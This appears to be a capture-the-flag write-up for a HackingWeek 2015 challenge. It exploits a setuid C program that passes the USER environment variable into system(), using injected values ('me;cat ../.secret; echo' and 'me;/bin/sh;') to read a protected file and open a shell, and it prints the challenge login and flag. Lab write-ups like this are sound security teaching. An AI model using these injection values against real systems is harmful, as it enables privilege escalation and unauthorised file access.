English [HackingWeek 2015] [Exploit1] Write Up

Description

Log on as guest (password: shu1eKoo) on machine 37.187.22.21.
You will find the hidden validation key in /home/exploit01/.secret.

$> ssh guest@37.187.22.21

Resolution

We were given those files:
guest@ns314076:/home/exploit01/project$ ls -la

total 24
dr-xr-xr-x 2 exploit01 exploit01 4096 Apr 29 15:17 .
dr-xr-xr-x 3 exploit01 exploit01 4096 Apr 29 15:18 ..
-r--r--r-- 1 exploit01 exploit01  208 Apr 29 15:16 Makefile
-r-sr-sr-x 1 exploit01 exploit01 5590 Apr 29 15:17 vulnerable
-r--r--r-- 1 exploit01 exploit01  345 Apr 29 15:13 vulnerable.c

The source of the “vulnerable” binary is provided, let’s check it.
guest@ns314076:/home/exploit01/project$ cat vulnerable.c

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
  char *buffer = NULL;
  gid_t gid = getegid();
  uid_t uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  asprintf(&buffer, "/bin/echo %s is using this program!", getenv("USER"));
  system(buffer);

  return EXIT_SUCCESS;
}

As we can see, the system() call executes everything passed in the &buffer through the USER environment variable.
By default, the $USER variable contains the current logged user.
guest@ns314076:/home/exploit01/project$ echo $USER

guest

So logically if we execute the binary, it will output guest:
guest@ns314076:/home/exploit01/project$ ./vulnerable

guest is using this program!

Now let’s replace “guest” by few commands, all separated by a semicolon.
We modify the USER variable to execute “/bin/echo me;cat ../.secret; echo is using this program!”:
guest@ns314076:/home/exploit01/project$ export USER='me;cat ../.secret; echo'

Then we relauch the program:
guest@ns314076:/home/exploit01/project$ ./vulnerable

me
raht6ae1Ue
is using this program!

Flag is raht6ae1Ue

By the way, if we wanted to get a shell, it would be possible using:
guest@ns314076:/home/exploit01/project$ export USER='me;/bin/sh;'
guest@ns314076:/home/exploit01/project$ ./vulnerable

me
sh-4.2$ cat /home/exploit01/.secret
raht6ae1Ue

Leave a Reply

Your email address will not be published.